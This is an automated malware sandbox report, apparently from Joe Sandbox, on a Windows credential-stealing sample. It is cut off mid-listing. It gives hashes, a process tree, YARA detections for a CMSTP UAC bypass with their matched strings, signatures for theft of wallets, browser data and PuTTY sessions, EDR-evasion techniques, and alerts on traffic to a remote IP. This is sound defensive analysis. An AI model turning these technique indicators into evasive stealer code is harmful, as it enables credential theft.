Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9mauyKC3JW.exe

Overview

General Information

Sample name:9mauyKC3JW.exe
renamed because original name is a hash value
Original sample name:ae130c89b7d8c4c9fd06422faeb79fc9.exe
Analysis ID:1581191
MD5:ae130c89b7d8c4c9fd06422faeb79fc9
SHA1:b5fdcc9e63448dd0f68b75b7bf54ff3fef94623c
SHA256:b13a4e5207954eaeb6aaf32e333a4f366a86afc0779406c9bf17805d5b83e2e9
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 9mauyKC3JW.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\9mauyKC3JW.exe" MD5: AE130C89B7D8C4C9FD06422FAEB79FC9)
    • hv.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Temp\hv.exe" MD5: 480F8CF600F5509595B8418C6534CAF2)
      • hv.exe (PID: 7960 cmdline: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe MD5: 480F8CF600F5509595B8418C6534CAF2)
        • cmd.exe (PID: 7996 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Localdockerv3.exe (PID: 1296 cmdline: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • hv.exe (PID: 1612 cmdline: "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe" MD5: 480F8CF600F5509595B8418C6534CAF2)
    • cmd.exe (PID: 3344 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • hv.exe (PID: 3324 cmdline: "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe" MD5: 480F8CF600F5509595B8418C6534CAF2)
    • cmd.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Localdockerv3.exe (PID: 4080 cmdline: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.1869601740.0000000002D60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000002.00000002.1486704045.000000000CA16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000010.00000002.2093039853.0000000005611000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000014.00000002.2211481934.0000000002782000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            10.2.cmd.exe.2d607f8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              10.2.cmd.exe.2d607f8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x10f28:$s2: Elevation:Administrator!new:
              8.2.Localdockerv3.exe.284faed.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                8.2.Localdockerv3.exe.284faed.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x25f20b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x25f296:$s1: CoGetObject
                • 0x25f1ef:$s2: Elevation:Administrator!new:
                10.2.cmd.exe.2c34a28.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 11 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T08:15:52.621984+010020283713Unknown Traffic192.168.2.849711172.67.153.243443TCP
                  2024-12-27T08:15:55.284043+010020283713Unknown Traffic192.168.2.849713172.67.153.243443TCP
                  2024-12-27T08:15:57.338216+010020283713Unknown Traffic192.168.2.849714172.67.153.243443TCP
                  2024-12-27T08:16:05.356520+010020283713Unknown Traffic192.168.2.849716172.67.153.243443TCP
                  2024-12-27T08:16:08.819571+010020283713Unknown Traffic192.168.2.849717172.67.153.243443TCP
                  2024-12-27T08:16:10.842099+010020283713Unknown Traffic192.168.2.849718172.67.153.243443TCP
                  2024-12-27T08:16:12.781810+010020283713Unknown Traffic192.168.2.849719172.67.153.243443TCP
                  2024-12-27T08:16:14.704165+010020283713Unknown Traffic192.168.2.849720172.67.153.243443TCP
                  2024-12-27T08:16:17.109798+010020283713Unknown Traffic192.168.2.849721172.67.153.243443TCP
                  2024-12-27T08:16:19.577127+010020283713Unknown Traffic192.168.2.849722172.67.153.243443TCP
                  2024-12-27T08:16:23.630281+010020283713Unknown Traffic192.168.2.849723172.67.153.243443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-27T08:15:53.549685+010020565501A Network Trojan was detected192.168.2.849711172.67.153.243443TCP
                  2024-12-27T08:16:24.333173+010020565501A Network Trojan was detected192.168.2.849723172.67.153.243443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\iepdf32.dllReversingLabs: Detection: 39%
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dllReversingLabs: Detection: 39%
                  Source: 9mauyKC3JW.exeVirustotal: Detection: 29%Perma Link
                  Source: 9mauyKC3JW.exeReversingLabs: Detection: 42%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Local\Temp\yhgJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\cvnmqJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: Yara matchFile source: 10.2.cmd.exe.2d607f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Localdockerv3.exe.284faed.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.cmd.exe.2c34a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.Localdockerv3.exe.2788a20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Localdockerv3.exe.28506ed.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.Localdockerv3.exe.280aa20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.Localdockerv3.exe.27cdaed.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1869601740.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1486704045.000000000CA16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2093039853.0000000005611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2211481934.0000000002782000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1869821197.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1776755377.0000000005769000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Localdockerv3.exe PID: 1296, type: MEMORYSTR
                  Source: 9mauyKC3JW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49723 version: TLS 1.2
                  Source: Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\41\89\Local State source: Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1971403578.0000000000B26000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: [\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: j\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.iniiiNp source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: H\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.iniAC source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ls\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State-;}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: "winload_prod.pdb3 source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.inid~} source: Localdockerv3.exe, 00000008.00000003.1997630296.0000000000A9D000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: CC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\crosoft.WindowsAlarms source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160661904.0000000000A93000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2113703918.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: D:\a\pdfium-binaries\pdfium-binaries\pdfium\out\pdfium.dll.pdb source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000003345000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1460868437.000000000D1E2000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmp, hv.exe, 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\cs source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbloaded source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State^;:}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ]C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini^ source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 